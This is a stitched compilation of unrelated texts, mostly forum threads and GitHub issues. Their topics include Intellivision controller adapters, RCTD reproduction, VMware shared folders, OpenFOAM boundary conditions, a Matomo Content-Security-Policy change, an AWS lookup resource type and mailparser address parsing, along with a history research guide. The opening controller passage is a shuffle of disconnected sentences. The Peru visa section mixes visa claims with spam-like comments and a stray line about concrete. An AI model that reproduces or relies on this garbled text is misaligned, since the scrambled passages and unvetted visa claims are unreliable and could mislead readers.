The Music Synthesizer is also supported! I mapped the inputs to the following keys. That might be something the author of the adapter can account for in firmware. When pin 8 is grounded, pins 1-4 are the four directions and pin 6 is the left fire button. Not sure why since the rest all reacted the way they should. Are you using Intellivision 1 controllers? New games, collections, gadgets and more. ReVival Retro Magazine ReVival is the only european magazine totally devoted to alternative consoles since 1997. Click the Add to Cart button below. Additionally, Nostalgi a also runs homebrew games that have been crea ted over the years by Intellivis ion enthusiasts. But how many bits are returned - 8? Speaking of emulators, what are the popular ones for Intellivsion? This setup is for navigation of the EmulationStation and RetroPie software only, and has nothing to do with the controls used in game play. Once removed, you can then insert the connector on either way to then get the wires in the correct order. When I go into the Input Editor, it only seems to accept mapping from the keyboard for the various Colecovision controller functions. This site focuses on the Intellivision and Colecovision but. Last tests I guess need to be on the emulation station. Range -127 to 127 0 is center. You will need the Inty 1 dongles. Does it remind you of Grey code? Solved various minor bugs and updated manual. Just learned of the Bliss-box today. One thing that could be an issue: My Arduino files are in several locations on my hard drive. I've found some documentation on how the coleco controllers work and sent him the links. I think I saw them posted for download on a reto site. K0 - triggers B15 and B23. Imagic Wing War prototype box A perfect replica of the lost Wing War prototype box from Imagic, Intellivision version. They made interfacing to the Intellivion controller easy to understand and saved me the time of having to figure it for out myself. Besides, I was sure the controller would be just fine with only three out of four screws. I am using a set of original controllers to development with. Did it send key presses for all of the Coleco controller functions? To get around this, the key on the dongle can be easily pried off with a small screwdriver or tip of a knife blade. What are the popular emulators for Colecovision that I should look at? I wanted to try running an emulator of Intellivision on the Pc, What are people using for controls? I think this better than using key presses for everything, as the emulator would not be able to tell which controller a key came from, and seems like that would be a problem in a two-player game. And memory limit detection for variables. I've emailed him twice over the last month to see if I could commission him to build and sell one. Be sure to contact me with your results! What I would like to see as an adapter is one that would allow me to use any Atari style joysticks in the Intellivision console. Works with removable controllers from Intellivision systems such as the Intellivision 2. Now I just got to dig up some controllers. The main loop will read the state of all input pins in both the Keypad and Controller modes as many times as possible within a frame. Yea I guess it was a dragon without wings- to me it looked like a bear -It took 2 shots to kill. The only game I have tried it on is Turbo, which granted is designed for a different controller, but, never the less, I have to spinner the spinner a lot. I have taken the time to create an section to detail my findings. I have tested it with the Arduino Leonardo and Arduino Micro. I will get such a kick out of playing my old atari 800 and atari 2600 games on an emulator, on my vista laptop, with an actual atari joystick. After testing for about 10 seconds I found the issue. As usual, everything is open-source so you'll find schematics and source code on this page. All reaction times seemed normal. Out of the box the Arduino Leonardo and the Arduino Micro appear to the host computer as a generic keyboard and mouse. There are no emulators that natively support the Colecovision spinner. K2 - triggers B6 and B21. Button 1 seems completely unassigned. K9 - triggers B13 and B17. The only thing left to figure out is covering the back hole where the wires were originally sticking out of the controller. Thanks a million - - - Bob Z. I then deleted the keyboard settings for player 2 since they were crossing each other up. Thanks- As far as I know, Raphnet is the only option. Use in your word processor! Does the Sears controllers come with the straight cord instead of the curly one? Range -127 to 127 0 is center. Using the Autosense Mode Autosense Mode supports all. Please note, however, that the procedures above have worked in my case without any damages or problems. Hopefully this will get fixed in a future version.
OPCFW_CODE
Cannot reproduce the results in Figure 4 Hi, Thank you for the nice work! I am trying to reproduce the STARmap simulation results of Figure 4, but the RCTD results I obtained are slightly different from what you shared in the folder FigureData/Figure4/Dataset10_STARmap/Result_STARmap/RCTD_result.txt. Specifically, I am using following datasets as the input data: Spatial count: FigureData/Figure4/Dataset10_STARmap/Simulated_STARmap/combined_spatial_count.txt scRNA-seq reference: from the DataUpload.zip file in the shared google drive: DataUpload/Dataset10/scRNA_count.txt scRNA-seq reference annotation: FigureData/Figure4/Dataset10_STARmap/Rawdata/starmap_sc_rna_celltype.tsv Am I using the correct input files as you used for the STARmap experiments in Figure 4? Or did you do further preprocessing before using them as inputs for deconvolution? I tried to follow BLAST_CelltypeDeconvolution.ipynb as well, but in there it is mentioned that for SpatialDWLS, RCTD, Seurat and SPOTlight, the input is a .h5seurat file, which I cannot find. For further details, I used the above mentioned files as input for RCTD with default parameters, and comparing the results I got with the shared RCTD_results.txt, the mean difference across cell types are listed below: Astro Endo Excitatory.L2.3 Excitatory.L4 0.008530383 0.013151105 0.033019338 0.040755041 Excitatory.L5 Excitatory.L6 Inhibitory.Other Inhibitory.Pvalb 0.037881955 0.058106645 0.048388479 0.050582087 Inhibitory.Sst Inhibitory.Vip Micro Neuron.Other 0.072285689 0.017592593 0.006866524 0.012171693 Olig Other Smc 0.019501107 0.009123502 0.004113764 I am trying to understand what caused the difference. Thanks! Hi~ Thank you for your interest in our data associated with the paper. We provided the h5ad file for users to reproducing our results. So if you want to get the result for RCTD, you can used the R command: Convert("FigureData/Figure4/Dataset10_STARmap/Simulated_STARmap/starmap_sc_rna.h5ad", dest = "h5seurat", overwrite = TRUE) Convert("FigureData/Figure4/Dataset10_STARmap/Simulated_STARmap/starmap_spatial.h5ad", dest = "h5seurat", overwrite = TRUE) to obtain the h5seurat files as input. And we have checked the result for RCTD, we have get the same result with what we shared in the folder. We don't know if different platforms may cause slightly different results. You can use the converted h5seurat file sa input to compare the result for RCTD.
GITHUB_ARCHIVE
I am using Workstation 16 Pro(Version 16.2.1 build-18811642) and on my Kali Linux VM, I can't mount a folder from my host OS which is Windows. This has worked for other virtual machines but not sure why this has stopped working. This is how it looks in the VM settings(same as it looks for other VMs where it works to mount a folder from my host OS) But nothing shows up here: It does show up in /media/ folder but the folder is empty(it's not empty on the host OS): Anyone have any ideas how I can solve this? There's a known issue with VMware Tools, perhaps the following snippet helps. VMware Tools Issues in VMware Workstation or Fusion Shared Folders mount is unavailable on Linux VM. If the Shared Folders feature is enabled on a Linux VM while it is powered off, the shared folders mount is not available on restart. Note: This issue is applicable to VMware Tools running on Workstation and Fusion. If the VM is powered on, disable and enable the Shared Folders feature from the interface. For resolving the issue permanently, edit /etc/fstab and add an entry to mount the Shared Folders automatically on boot. For example, add the line: vmhgfs-fuse /mnt/hgfs fuse defaults,allow_other 0 0 Thanks for your answer. I added /etc/fstab with my mount folder and that line, but now I can't start the VM so that was not so good. See this error: https://imgur.com/bzdZIG7 Luckily, I got a backup of this VM and can restore it, and then try the instructions here https://kb.vmware.com/s/article/74650 Not sure why you are getting that error. Never seen that one before after editing /etc/fstab I take it that you have installed vmware tools already? You could try and customize the power-on script yourself, but I would have to look up where is located. I followed this one https://kb.vmware.com/s/article/74650 , and after doing steps 1-5, it mounted the folder and I could view the contents of it. But then I rebooted the machine and wanted to see if it automatically mounted after reboot, but it did not. Then I got the following messages: sudo systemctl start mnt-hgfs.mount Failed to start mnt-hgfs.mount: Unit mnt-hgfs.mount has a bad unit file setting. See system logs and 'systemctl status mnt-hgfs.mount' for details. systemctl status mnt-hgfs.mount ● mnt-hgfs.mount - VMware mount for SharedFolder Loaded: bad-setting (Reason: Unit mnt-hgfs.mount has a bad unit file setting.) Active: inactive (dead) Do you have any ideas about why it gives this error now but worked before a reboot? Once I fix this, it's gonna work after reboot and then everything is solved so we are soon there. No sorry I don't know. I do not use systemd for this myself, I only provided it because VMware recommends that article. If I do not really have to use systemd I steer clear from it. In my linux VM's the /etc/fstab solution works well. I'm still wondering what went wrong in the first place.. Did you create the folder to mount hgfs at before hand? eg. can you try this: sudo mkdir -p /mnt/hgfs/ sudo /usr/bin/vmhgfs-fuse .host:/ /mnt/hgfs/ -o subtype=vmhgfs-fuse,allow_other Does that create the shared folder so you can at least use it? Yeah that works and then I can use it and see the files if I run those commands. But I can't see the files after a reboot. But that's fine for now I guess, I'll just save and run those commands every time I boot the VM or when I need to use a shared folder. Thanks a lot for your help, appreciate it! I have to look at this later on myself as I note that I commented out the /etc/fstab line in my debian. Sigh.. perhaps I did have the same thing like you, but just forgot about it as I don't use that VM often nowadays. FWIW, the default poweron script it complains about can be found under /etc/vmware-tools Normally the default should be OK. Just pointing to the location where it probably goes wrong when looking at the screenshot you provided earlier on. Too much other stuff going on for me now to chase it down myself.
OPCFW_CODE
How to Narrow Your Topic "I'm writing a paper on World War II." Often students start their research with a very general topic, even though they may realize the topic is too large to deal with in a 10-15 page paper. Faculty and librarians tell them, "You have to narrow this down." But how do you narrow a topic? - What discipline am I working in? If you are in a sociology class, ask a sociological question about World War II, like "How did WWII affect women?" If it's a political science class, your question might be something like "How did WWII affect presidential elections in the US?" - What are some subsets or aspects of your topic. Some good aspects are: - by place, such as a country or region - by time period, such as a century, decade or year - by population, such as men, women, ethnic group, youth, children or elderly You can combine these ideas, "What were the major impacts of WWII on women in France, in the decade after the war?" More ideas in our brief tutorial on topic selection and narrowing. Types of History topics Three kinds of topics || Three research strategies 1. The evolution of Stokely Carmichael This is a kind of biographical topic, which is pretty easy to get started with because the search term is obvious, but the topic still needs to be narrowed to say something meaningful in a short [10 pp] paper 2. RFK and the Cuban Missile Crisis This is a political history topic, with a specific event in mind, and a specific individual. This is an easy kind of topic to start researching because there are two very obvious search terms, and the time frame is self-defined. However it still needs to be narrowed to say something meaningful in a short paper. 3. Automobiles: Unions, Consumerism, and Social Change (1950s) This is a social history topic, not associated with a single person, or a single event. This is a little harder to research because you need to specify what you mean, in order to narrow the topic. It helps to find the names of specific unions [in this case], and to consider what specific social changes you are interested in. You need to think: what kind of primary sources would give evidence of this/these social change/s? How will you prove there really was an impact on society from this phenomenon? What kind of topic do you have? Where to search & what words to use What kinds of evidence [i.e., primary sources] do you want to find? - Biographical topics: What kinds of primary sources will give evidence of the changes this person went through or their impact on society? Why should we care about this person? - Event- based topics: You need to think: what kind of primary sources will give evidence of a relationship between the person and the event? Why should we care? - Social history topics: You need to think: what kind of primary sources would give evidence of this/these social change/s? How will you prove there really was an impact on society from this phenomenon? The Research Process Choose a topic. Do a brain dump: Note down what you already know about your topic, including - Names of people, organizations, companies, time period you are interested in, places of interest [countries, regions, cities] Fill in the gaps in your knowlege: get background information from encyclopedias or other secondary sources. Wikipedia can be good here. Select the best places/ databases to find information on your topic. Look under the History Databases tab of this guide for article database suggestions. Or use a catalog like Oskicat or Melvyl to search for books and other resources. Use nouns from your brain dump as search terms. Evaluate what you find. Change search terms to get closer to what you really want. Refine Your Topic - Using the information you have gathered, determine if your research topic should be narrower or broader. You may need to search basic resources again using your new, focused topics and keywords. Take a look this short tutorial on beginning your research for more ideas. Choosing a Discipline So, how do you know what disciplines you should use? - Look at the department your class is offered by. That's a pretty obvious clue. - Think about what other disciplines might discuss your topic. For instance, a paper on Education in Chile could involve both Education and Latin American Studies. What do you do with this information? Search in the article databases dedicated to those disciplines. Here's a list of databases for each discipline, by campus. - Berkeley databases - Davis databases - Irvine databases - Los Angeles databases - Merced databases - Riverside databases - San Diego databases - Santa Barbara databases - Santa Cruz
OPCFW_CODE
Philippine passport holder do not have to submit an application for a vacationer visa just before coming to Peru. You discover the proof possibly on this site when opening the pdf document "International locations with Visa Obligations" (posted with the International Affairs Ministry) or on the web site of DIGEMIN, Peru's immigration office beneath this hyperlink ("") (have a look at site three "Asia", underneath Filipinas you see "NO"; so no visa necessary for the max. continue to be of 183 times). Soon after investigation a few of the weblog posts on your Site now, and I actually like your method of running a blog. I bookmarked it to my bookmark Web-site checklist and may be checking back quickly. Pls Examine my Web page on the net at the same time and allow me to determine what you believe. So you should have not less than (!) three hrs between your flights. Please Notice that it's not unheard of that Worldwide flights aren't promptly and domestic flights may alter their departure time. Take note! The 2nd time you enter Peru it might be tougher to get 183 days - sometimes they offers you thirty or 60 times even if you request For additional. You will also find cases where the immigration workers has requested for money underneath the table to give you much more days. In some cases it’s can take a little luck to have the level of times you would like. But try and be firm and insist on the quantity of times you will need. Should you obtained a superior quantity of days on your tourist visa, a strategy is to attend until finally your tourist visa has less than 30 times still left prior to leaving and re-coming into the state, so you don’t threat coming back using a new other tourist visa that may shorten your keep. These procedures in addition labored as a terrific way to fully grasp that some other person have similar want the same as my individual possess to realize fantastic offer extra pertaining to this situation. I understand you will find a lot of much more pleasurable intervals Sooner or later for folk who start examining . If you find a method of getting employed, then you must fill in this manner: and spend $forty nine.90 USD to your Banco de la Nacion. You are going to bring the receipt of your payment along with a duplicate of your passport and a replica of you TAM card (the paper you received at the airport when coming into Peru). Vacationers have to have a passport legitimate at the least fifty percent a yr with at least two cost-free internet pages during the visa section when entering Peru. To stop any feasible complications when coming into Peru, I might get in connection with the closest Peruvian consulate. I do not know how long it will choose to obtain the visa as processing occasions and workload on the consulate may differ. So very best request with the consulate you should apply. I'm trying to enter the nation and I used to be thinking if their is any limits for Individuals who have been convicted of felonies inside the United states? Remember to Notice that it is your nationality and never a potential home allow Out of the country that's the determining component if you need a visa or not! Generally citizens of your international locations within the listing down below don't have to apply for a visa at an embassy or consulate in advance of moving into Peru. A passport legitimate at least 6 months with not less than two cost-free pages inside the visa section is sufficient to get a Vacationer Visa (basically it's only an entry stamp) straight on the border or maybe the airport. You don’t must do anything at all to it but incorporate water. If your floor is rather dry it will pull the water out of your quikrete. After you dig your hole and your ground is dry damp the bottom in hole. Spray it While using the hose all around the sides and bottom. Yo soy Hernan un Filipino, voy a viajar a Peru el 24, cuanto tiempo durara la validez de una visa de turista?
OPCFW_CODE
Device disconnected, reconnection impossible Hello, I use this add-on to connect a Warema Stick from a RPi 3 (USBip server) to my main RPI4 where HA runs. On the first start of the system (e.g after piwer outage) the add-on starts correctly and the connection stays active until some network error stops the connection. However, instead of detaching the device cleanly (so it can be reattached after a restart of the add-on), the add-on gets into some kind of error state where the device isn't available on the HA host, but is also not detached, leading to a fault that can only be fixed by restarting the USBip server. The Log outputs the following message when attempting to reconnect while in this state: cont-init: info: /etc/cont-init.d/create_devices.sh exited 0 cont-init: info: running /etc/cont-init.d/load_modules.sh cont-init: info: /etc/cont-init.d/load_modules.sh exited 0 s6-rc: info: service legacy-cont-init successfully started s6-rc: info: service legacy-services: starting services-up: info: copying legacy longrun usbip (no readiness notification) services-up: info: copying legacy longrun usbipd (no readiness notification) [19:09:14] INFO: Starting the USBIP Daemon [19:09:14] INFO: Attaching usbip devices usbipd: info: starting usbipd (usbip-utils 2.0) usbipd: info: listening on <IP_ADDRESS>:3240 usbipd: info: listening on :::3240 s6-rc: info: service legacy-services successfully started ++ mount -o remount -t sysfs sysfs /sys ++ /usr/sbin/usbip --debug attach -r <IP_ADDRESS> -b 1-1.2 usbip: debug: usbip.c:129:[run_command] running command: `attach' usbip: error: tcp connect [19:09:17] WARNING: usbip crashed, halting add-on [19:09:17] INFO: usbip stopped, restarting... s6-rc: info: service legacy-services: stopping usbipd: info: shutting down usbipd [19:09:17] INFO: usbipd stopped, restarting... The add-on should normally detach devices when stopped, but it doesn't do this in this case... How could I fix this? Best regards Aaron Eisele @Aaroneisele55 The most recent update I made was adding a "shutdown" script https://github.com/irakhlin/hassio-usbip-mounter/blob/main/rootfs/usr/bin/unmount_devices If you shutdown the addon it will correctly detach from the server and thus the device can be reconnected. Unfortunately if there is some kind of network error or power outage and the script does not run the detach will not happen. From playing around with usbip outside of home assistant I have noticed that this issue will occur regardless. If the client does not correctly detach from the server the server ends up in a weird state. I will have to look into this to see if its something that can easily be solved. I just thought about it and I think I have found a possible solution: If the add--on crashes due to not being cleanly detached at some point, couldn't we just run the detachment script (from #6 ) when usbipd crahes, and then reattach the devices so the problematic state is resolved? I just thought about it and I think I have found a possible solution: If the add--on crashes due to not being cleanly detached at some point, couldn't we just run the detachment script (from #6 ) when usbipd crahes, and then reattach the devices so the problematic state is resolved
GITHUB_ARCHIVE
Fullstack (React) Capstone Project from Thinkful's Fullstack Web Development program. - Do something interesting or useful. - Be a fullstack app using HTML, CSS, React, Node, Express, and Mongoose. - The client and API should be deployed separately and stored in separate GitHub repos. - Both client- and server-side code should be tested, and you should use TravisCI for continuous integration and deployment. - Your app should be responsive, and should work just as well on mobile devices as it does on desktop devices. - All code should be high quality, error free, commented as necessary, and clean. - The styling on your client should be polished. - Your app should have a landing page that explains what the app does and how to get started, in addition to pages required to deliver the main functionality. - provide DEMO account credentials - username: demo - password: demopassword CryptoKeeper is a cryptocurrency tracking application using real-time market data via Socket.IO and Cryptocompare. The current cryptocurrencies tend be quite volatile compared to more traditional currencies and stocks with prices sometimes dropping or increasing drastically in a matter of hours. By registering for an account, users can overcome the uncertaintity of keeping up with the market by creating custom events to monitor a given currency for a specific condition. (e.g. Bitcoin just reached $12k, Ethereum dropped 5%) If and when a condition is eventually met, a notification will be sent to the user via text message and/or email indicating the current price. User's have control over each event condition as well as the method of deilvery and custom message that will be displayed with the notification. - A BDD / TDD assertion library for node and the browser, works seamlessly with Mocha testing framework among others - A plugin for Chaijs that integrates HTTP testing with Chai assertions - Continuous Integration testing that tests latest build before deploying to production environment - Task manager - Node package that restarts server and made for use with Gulp tasks - Automation tool to make the development process faster. - Allows for multiple screens to reload live and all interactions are in synchronization, mirroring actions across every browser on any device located on local network. - compatible with Gulp - Gulp + gulp-nodemon + Browsersync combine to streamline the entire development process - Hosted on Heroku's Cloud Application Platform - (PaaS) platform as a service - Cloud MongoDB hosting provided by mLab - All tests handled by Mocha.js using Chaijs and chai-http assertion libraries to test API endpoints - Used by TravisCI to test master branch before deploying to production environment on Heroku - A cron job is dispatched every 10min to check all user event conditions against the current cryptocurrency prices. If a condition passes, notifications are sent to users via sms text message using Twilio services and / or via email using Mailgun services. - User authentication is handled using Passport.js with a JWT authentication token strategy. User requests must provide a valid JWT auth token in header to access protected endpoints. Token renews itself automatically and expires after 7 days. - Image files are stored in base64 binary encoding using GridFS, a MongoDB specification that saves larger files in chunks and combines these chunks on request to serve the original file back to client. Video file storage to be implemented soon. - Market data is powered by the Cryptocompare API and websocket
OPCFW_CODE
Fixes #17773 by setting a Content-Security-Policy which is fairly loose at this stage. I think we should only be using Content-Security-Policy-Report-Only for at least one or two releases as I'm sure there are a lot of people with weird setups where the CSP will break in fascinating ways. I still think it is worth creating a secure one for Matomo as it will make Matomo a lot more secure, but also provide an option to fall back to Report-Only or disable it, for setups where using one is not possible. 👍 be good indeed to have such an option to disable it, or using report-only. And could indeed start with report-only. Maybe in dev mode we would always from beginning use the real one so it's easier to make things compatible? might not make sense though just some thoughts. I suppose this would give some people more time to adjust their setup if needed. They might not notice these reports but at least they might notice it in the changelog maybe? We could have a setting to choose between enabled, disabled, or report only mode, defaulting to disabled or report only. I've added a couple of settings, one to enable/disable and one to specify a report-uri. CSP is disabled by default for now, specifying a report-uri will switch it to Content-Security-Policy-Report-Only 👍 @justinvelluppillai it seems report-uri is deprecated see https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/report-uri ? Could maybe remove this feature and then have only one setting for the three different modes (disabled, report, enabled)? Or seems it might be replaced by https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/report-to ? I don't know how commonly used it is. If it's not commonly used that often someone could maybe add this feature as a plugin. While report-uri seems to be deprecated, it is the only parameter that is actually supported by browsers: report-to is not supported by any non-chrome browser: https://caniuse.com/mdn-http_headers_report-to Content-Security-Policy-Report-Only makes also sense without a report-uri (especially during development) as it will log violations in the console. Huh, I didn't notice that in my investigations. A couple of possible approaches: Both trivial to implement, option 1 provides more possible configurations but I lean towards option 2 for simplicity, if everyone agrees? I think we could either add two settings (one switching between on, report-only and off and one specifying the report-uri (or being empty)) or use three settings (like e.g. in https://github.com/Chocobozzz/PeerTube/blob/develop/config/default.yaml#L151-L154) I suppose using two settings could work and let us extend it better in the future if we were to decide to add more features (which isn't currently needed). So something like you mention csp_enabled = 0/1 csp_report_only = 0/1 . # Only does something if csp is enabled @justinvelluppillai it seems like the Page Overlay feature doesn't work yet when the URL is from a different page? I just tested it and it won't load the site. @tsteur with the default settings we've chosen (report-only) it should still work as normal but report some issues. I can modify the Page Overlay feature to use a different (or no) CSP. I will take a look at getting the Page Overlay feature running locally then see what's best. fyi I tested with in report mode (not report-only). This issue is in "needs review" but there has been no activity for 7 days. ping @matomo-org/core-reviewers @sgiehl it'd be great if you could give this a check over and if all ok we can merge as it won't have too much impact until we enable it. @justinvelluppillai Sure. Feel free to simply use the github feature to request for reviews in the future if you need one ;-)
OPCFW_CODE
Add AwsCommunity::Resource::Lookup resource type. Issue #, if available: Description of changes: Add AwsCommunity::Resource::Lookup resource type. Tests excerpts Unit tests excerpts [...] [INFO] --- jacoco:0.8.9:check (jacoco-check) @ awscommunity-resource-lookup-handler --- [...] [INFO] Analyzed bundle 'awscommunity-resource-lookup-handler' with 10 classes [INFO] All coverage checks have been met. [...] Contract tests excerpts [...] 13 passed, 2 skipped, 9 deselected, 1 warning in 1021.84s (0:17:01) [...] By submitting this pull request, I confirm that you can use, modify, copy, and redistribute this contribution, under the terms of your choice. I like this a lot! A few feature requests: Can we add a Serial or Trigger parameter (like AwsCommunity::Time::Sleep), so that you can refresh the value without changing the query (It's not a 100% clear to me from the schema if changing the query triggers a new lookup, so making that more clear might be a good thing too)? Would AwsCommunity::Resource::Lookup be a better name, if that's the only output it can generate? And some questions related to that: I think there is also a need for a way to get other properties of a resource. This could be part of this (there could be a JmesPathSelectorQuery and a JmesPathOutputQuery, or a separate thing (AwsCommunity::Resource::Read). a way to get a list of resources / identifiers / properties (in that case I think it makes more sense to have a AwsCommunity::CloudControlQuery::List and AwsCommunity::CloudControlQuery::Get resource, and not the two different kinds of JmesPath). (eg. I want all the subnets of one vpc that have the type=private tag). Can we add a Serial or Trigger parameter [...] I am currently looking into adding and testing a LookupSerialNumber property in the schema for this. Added in a new commit. [...] (It's not a 100% clear to me from the schema if changing the query triggers a new lookup, so making that more clear might be a good thing too)? Added this clarification to the description of the relevant property in the schema in the same new commit as well. Added changes - no code changes made. Contract tests excerpts: 13 passed, 2 skipped, 9 deselected, 1 warning Small schema and docs updates made. No code changes. Contract tests excerpts: 13 passed, 2 skipped, 9 deselected, 1 warning Another small documentation-related update made, in the schema. No code changes. Contract tests excerpts: 13 passed, 2 skipped, 9 deselected, 1 warning Made additional changes to the README.md file. Please review - thanks! Added changes for using a namespace for the primary ID. Tests excerpts: [...] [INFO] ------------------------------------------------------- [INFO] T E S T S [INFO] ------------------------------------------------------- [INFO] Running com.awscommunity.resource.lookup.LookupHelperTest [INFO] Tests run: 20, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1.508 s - in com.awscommunity.resource.lookup.LookupHelperTest [INFO] Running com.awscommunity.resource.lookup.ReadHandlerTest [INFO] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1.779 s - in com.awscommunity.resource.lookup.ReadHandlerTest [INFO] Running com.awscommunity.resource.lookup.CreateHandlerResourceLookupTest [INFO] Tests run: 9, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.09 s - in com.awscommunity.resource.lookup.CreateHandlerResourceLookupTest [INFO] Running com.awscommunity.resource.lookup.CreateHandlerTest [INFO] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.037 s - in com.awscommunity.resource.lookup.CreateHandlerTest [INFO] Running com.awscommunity.resource.lookup.ListHandlerTest [INFO] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.03 s - in com.awscommunity.resource.lookup.ListHandlerTest [INFO] Running com.awscommunity.resource.lookup.UpdateHandlerTest [INFO] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.041 s - in com.awscommunity.resource.lookup.UpdateHandlerTest [INFO] Running com.awscommunity.resource.lookup.ClientBuilderTest [INFO] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1.44 s - in com.awscommunity.resource.lookup.ClientBuilderTest [INFO] Running com.awscommunity.resource.lookup.TagHelperTest [INFO] Tests run: 16, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.013 s - in com.awscommunity.resource.lookup.TagHelperTest [INFO] Running com.awscommunity.resource.lookup.CreateHandlerStabilizeTest [INFO] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.005 s - in com.awscommunity.resource.lookup.CreateHandlerStabilizeTest [INFO] Running com.awscommunity.resource.lookup.DeleteHandlerTest [INFO] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.02 s - in com.awscommunity.resource.lookup.DeleteHandlerTest [INFO] [INFO] Results: [INFO] [INFO] Tests run: 63, Failures: 0, Errors: 0, Skipped: 0 [...] [...] INFO] --- jacoco:0.8.9:check (jacoco-check) @ awscommunity-resource-lookup-handler --- [...] [INFO] Analyzed bundle 'awscommunity-resource-lookup-handler' with 10 classes [INFO] All coverage checks have been met. [...] 13 passed, 2 skipped, 9 deselected, 1 warning
GITHUB_ARCHIVE
Hi, I have a problem with the I have a problem with the parallel execution of OpenFOAM. I've written a new boundary condition with calculated the input velocity profile of a square duct. If I run my case on one processor I just have to calculate the values a single time when starting my calculation ( if(ldb.timeIndex() < 1)... ). If I want to run my calculation in parallel mode I need to perform the calculation every time the program accesses the boundary condition (with is very often) and so I "waste" a lot of calculation time with a problem that doesn't change over time. If I don't do so the velocity at my patch is set to some time varying value, from with I guess that it's calculated during execution. How can I fix this problem? I've already consulted the forum and the wiki (I've started with the parabolicinletVelocityprofile fot writing my BC) but was unable to find an appropriate hint how to do this. Am I right, if I guess, that the problem is connected with the exchange of informations beween the processors? Thanks in advance Hi Christian, why do you need why do you need to calculate your BC only once in serial and many times in parallel? It sounds strange to me... However, you can let all your processes to calculate your BC when needed. I mean, do your computation on each processor at the same time, instead of doing it on the master node and send the result to the other processes... I hope this can help Hello Francesco, thanks for y thanks for you reply. Could you give me a hint how I do so, because I'm neither that much familiar with OpenFOAM nor with C++. I guess a good idea would be, that the program check whether a file with the calculated values exists and if so reads it as input. Otherwise the program should perform the calculation and write the output to the specific file. Thanks in advance Hello christian. It's not eas It's not easy to give you some hint, because I don't know exactly which is your problem... If you can calculate the values you need, I guess you can avoid writing them to a file. If your serial version works as you expect, simply let all the processors of a parallel run to do the same thing. If you rely on a file, you have to be sure that it exists at the beginning of the simulation, if you want to keep thing simple. Otherwise, if the file doesn't exist, simply calculate the values and store them in the BC data structure, without writing them to a file and read them back again. If you want to store those values for any reason, you can let only the master process to write it: [put your code here] If you want to make the master to write the file and the rest to wait for it to finish, is a bit more complicated... I hope this can help, Hi Francesco, thanks a lot fo thanks a lot for your help. I finally managed the problem with the parallel run by creating and writing a variable after the first calculation. So every processor can perfom the calculation if needed. Otherwise the data is just read out of the value variable. For a total beginner in C++ the openFOAM code is really difficult, because everything is coded so efficently. If you have any interest I can post my new boundary condition for the velocity profile of a square duct. Hi Christian, I started C++ m I started C++ mainly for OpenFOAM, and from my point of view it is not so difficult, because everything is coded so efficiently and in an elegant way! Try to put your hands in a badly written parallel code. It can be a nightmare, believe me... It would be nice to have a look to the BC, if you can post it, thanks. Hi Francesco, maybe you're ri maybe you're right. At the moment I'm updating the document management system of our institute, which is written in PHP. The scripts were created quick and dirty by someone several years ago. Even if PHP is very simple to understand, all the encoded layout options really got me rid. Compared to that openFOAM code is more than gold http://www.cfd-online.com/OpenFOAM_D...part/happy.gif. Attached you can find my new boundary condition which is an adaption of the parabolicVelocityProfile BC. If you find any mayor mistakes or so please report. |All times are GMT -4. The time now is 07:29.|
OPCFW_CODE
Parse To: header into a list of recipients instead of a string. To store multi-recipient messages I need a correctly structured JSON with the "To:" field to be returned as a list. Just by split()'ting by commas doesn't cuts it, since RFC-2822 address specification is more complex. Fortunately, Python's email.utils.getaddresses handles this. It even splits indvidual addresses into 'real name' and 'email address' parts. Output using tests/mails/mail_test_1: [...] mailparser_1 | "subject": "письмо уведом-е", mailparser_1 | "to": [ mailparser_1 | [ mailparser_1 | "", mailparser_1 |<EMAIL_ADDRESS>mailparser_1 | ] mailparser_1 | ], mailparser_1 | "receiveds": [ [...] Another (real) test message of mine containing the following 'To:': To<EMAIL_ADDRESS>"Test recipient, containing comma"<EMAIL_ADDRESS> gets parsed into: mailparser_1 | "to": [ mailparser_1 | [ mailparser_1 | "", mailparser_1 |<EMAIL_ADDRESS>mailparser_1 | ], mailparser_1 | [ mailparser_1 | "Test recipient, containing comma", mailparser_1 |<EMAIL_ADDRESS>mailparser_1 | ] mailparser_1 | ], mailparser_1 | "receiveds": [ (mailparser_1 is Docker Compose's leading prefix, since I'm using it to hack, see #12) Also, FYI, I'm about to do the same for the 'Headers:' field. Coverage increased (+0.03%) to 91.503% when pulling df5bd6f64a6c83e0f6cd7649dbd279fc32918b8d on pataquets:parse-to-into-a-list into 3015f639de02e796d057cf1534af27e5f6a7c77d on SpamScope:develop. Coverage increased (+0.03%) to 91.503% when pulling df5bd6f64a6c83e0f6cd7649dbd279fc32918b8d on pataquets:parse-to-into-a-list into 3015f639de02e796d057cf1534af27e5f6a7c77d on SpamScope:develop. Coverage increased (+0.03%) to 91.503% when pulling df5bd6f64a6c83e0f6cd7649dbd279fc32918b8d on pataquets:parse-to-into-a-list into 3015f639de02e796d057cf1534af27e5f6a7c77d on SpamScope:develop. Coverage increased (+0.03%) to 91.503% when pulling df5bd6f64a6c83e0f6cd7649dbd279fc32918b8d on pataquets:parse-to-into-a-list into 3015f639de02e796d057cf1534af27e5f6a7c77d on SpamScope:develop. Coverage increased (+0.03%) to 91.503% when pulling df5bd6f64a6c83e0f6cd7649dbd279fc32918b8d on pataquets:parse-to-into-a-list into 3015f639de02e796d057cf1534af27e5f6a7c77d on SpamScope:develop. @pataquets very good PR. Thanks a lot for your contribution. @pataquets in this commit I fixed 2 things: your change is in to_ property, so it's available in all code i replaced getaddresses with more specific parseaddr. I also fixed unittests.
GITHUB_ARCHIVE
